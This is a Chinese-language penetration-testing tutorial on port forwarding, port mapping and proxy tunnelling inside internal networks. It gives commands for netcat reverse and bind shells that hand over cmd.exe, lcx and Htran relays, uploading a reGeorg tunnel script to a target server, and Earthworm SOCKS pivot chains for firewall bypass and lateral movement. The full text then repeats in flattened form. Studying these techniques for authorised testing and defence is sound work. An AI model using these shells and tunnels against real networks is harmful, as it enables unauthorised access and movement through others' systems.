内网渗透之端口转发、映射、代理
字数 1915 2025-08-26 22:11:51

内网渗透之端口转发、映射与代理技术详解

端口转发与端口映射

基本概念

端口转发(Port forwarding):将一个网络端口从一个网络节点转发到另一个网络节点的行为,使外部用户能够通过激活的NAT路由器到达私有内部IP地址上的端口。

端口映射(Port mapping):NAT的一种,功能是把公网地址翻译成私有地址,将内网端口映射到公网上的某个端口。

区别与应用场景

  • 端口映射场景:外网主机A想访问内网主机B上的服务
  • 端口转发场景:外网主机A可以访问内网主机B的端口,但无法访问内网主机C的端口,此时可将C主机的端口转发到B主机的端口

正向连接与反向连接

  • 正向连接:攻击者机器连接目标机器
  • 反向连接:目标机器反连攻击者机器

常用工具及使用方法

Netcat (NC)

反向连接

场景:A(外网)无法访问B(内网),但B可以访问A

  1. 在外网主机A上执行:nc -nvlp 7777
  2. 在内网主机B上执行:nc -e cmd 192.168.0.226 7777

正向连接

场景:A(内网)可以访问B(外网),但B不能访问A

  1. 在内网A上执行:nc -l -p 5555 -e cmd.exe
  2. 在外网主机B上执行:nc -nvv 192.168.0.226 5555

Lcx

端口映射

场景:A(外网)无法访问B(内网),B可以访问A

  1. 在内网B上执行:lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389
  2. 在外网A上执行:lcx.exe -listen 7777 5555
  3. 连接A的5555端口即相当于连接B的3389

端口转发

场景:A可以访问B,B可以访问C,A不能访问C

  1. 在内网B上执行:lcx.exe -tran 7777 192.168.32.135 3389
  2. 访问B的7777端口即相当于访问C的3389

Htran

环境一:绕过防火墙限制

  1. 在B主机上执行:Htran2.4.exe -p -tran 7777 127.0.0.1 3389
  2. 连接B的7777端口即可访问其3389

环境二:多级转发

  1. 在A上监听:HTran2.4.exe -p -listen 8888 9999
  2. 在B上执行:HTran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389
  3. 连接A的9999端口即相当于连接B的3389

代理技术

代理类别

  • HTTP代理
  • SOCKS代理
  • FTP代理
  • Telnet代理
  • SSL代理

reGeorg + Proxychains

  1. 上传对应服务器脚本(tunnel.php)到目标服务器
  2. 访问确认代理成功(显示"All seems fine")
  3. 执行:python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888
  4. 使用Proxifier配置代理规则

基于PowerShell的SOCKS4/5代理

使用Invoke-SocksProxy:

  1. 导入模块:Import-Module .\Invoke-SocksProxy.psm1
  2. 创建代理:Invoke-SocksProxy -bindPort 1234
  3. 客户端使用SOCKS代理软件连接指定端口

Earthworm (EW)

六种链路状态

  • ssocksd
  • rcsocks
  • rssocks
  • lcx_slave
  • lcx_tran
  • lcx_listen

典型用法

  1. 正向SOCKS服务器./ew -s ssocksd -l 1080
  2. 反弹SOCKS服务器
    • 公网主机:./ew -s rcsocks -l 1080 -e 8888
    • 内网主机:./ew -s rssocks -d 1.1.1.1 -e 8888
  3. 多级级联
    • ./ew -s lcx_listen -l 1080 -e 8888
    • ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
    • ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

总结

端口转发、映射和代理技术是内网渗透中的核心技能,掌握这些技术可以突破网络限制,实现内网横向移动。不同工具适用于不同场景,需要根据实际网络环境选择合适的工具和方法。正向连接适用于攻击者可以直连目标的场景,反向连接则适用于目标可以出网但攻击者无法直连的场景。多级转发和代理技术可以穿透复杂的内网环境,实现深层次的渗透。

内网渗透之端口转发、映射与代理技术详解 端口转发与端口映射 基本概念 端口转发(Port forwarding) :将一个网络端口从一个网络节点转发到另一个网络节点的行为,使外部用户能够通过激活的NAT路由器到达私有内部IP地址上的端口。 端口映射(Port mapping) :NAT的一种,功能是把公网地址翻译成私有地址,将内网端口映射到公网上的某个端口。 区别与应用场景 端口映射场景 :外网主机A想访问内网主机B上的服务 端口转发场景 :外网主机A可以访问内网主机B的端口,但无法访问内网主机C的端口,此时可将C主机的端口转发到B主机的端口 正向连接与反向连接 正向连接 :攻击者机器连接目标机器 反向连接 :目标机器反连攻击者机器 常用工具及使用方法 Netcat (NC) 反向连接 场景 :A(外网)无法访问B(内网),但B可以访问A 在外网主机A上执行: nc -nvlp 7777 在内网主机B上执行: nc -e cmd 192.168.0.226 7777 正向连接 场景 :A(内网)可以访问B(外网),但B不能访问A 在内网A上执行: nc -l -p 5555 -e cmd.exe 在外网主机B上执行: nc -nvv 192.168.0.226 5555 Lcx 端口映射 场景 :A(外网)无法访问B(内网),B可以访问A 在内网B上执行: lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389 在外网A上执行: lcx.exe -listen 7777 5555 连接A的5555端口即相当于连接B的3389 端口转发 场景 :A可以访问B,B可以访问C,A不能访问C 在内网B上执行: lcx.exe -tran 7777 192.168.32.135 3389 访问B的7777端口即相当于访问C的3389 Htran 环境一:绕过防火墙限制 在B主机上执行: Htran2.4.exe -p -tran 7777 127.0.0.1 3389 连接B的7777端口即可访问其3389 环境二:多级转发 在A上监听: HTran2.4.exe -p -listen 8888 9999 在B上执行: HTran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389 连接A的9999端口即相当于连接B的3389 代理技术 代理类别 HTTP代理 SOCKS代理 FTP代理 Telnet代理 SSL代理 reGeorg + Proxychains 上传对应服务器脚本(tunnel.php)到目标服务器 访问确认代理成功(显示"All seems fine") 执行: python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888 使用Proxifier配置代理规则 基于PowerShell的SOCKS4/5代理 使用Invoke-SocksProxy: 导入模块: Import-Module .\Invoke-SocksProxy.psm1 创建代理: Invoke-SocksProxy -bindPort 1234 客户端使用SOCKS代理软件连接指定端口 Earthworm (EW) 六种链路状态 ssocksd rcsocks rssocks lcx_ slave lcx_ tran lcx_ listen 典型用法 正向SOCKS服务器 : ./ew -s ssocksd -l 1080 反弹SOCKS服务器 : 公网主机: ./ew -s rcsocks -l 1080 -e 8888 内网主机: ./ew -s rssocks -d 1.1.1.1 -e 8888 多级级联 : ./ew -s lcx_listen -l 1080 -e 8888 ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 总结 端口转发、映射和代理技术是内网渗透中的核心技能,掌握这些技术可以突破网络限制,实现内网横向移动。不同工具适用于不同场景,需要根据实际网络环境选择合适的工具和方法。正向连接适用于攻击者可以直连目标的场景,反向连接则适用于目标可以出网但攻击者无法直连的场景。多级转发和代理技术可以穿透复杂的内网环境,实现深层次的渗透。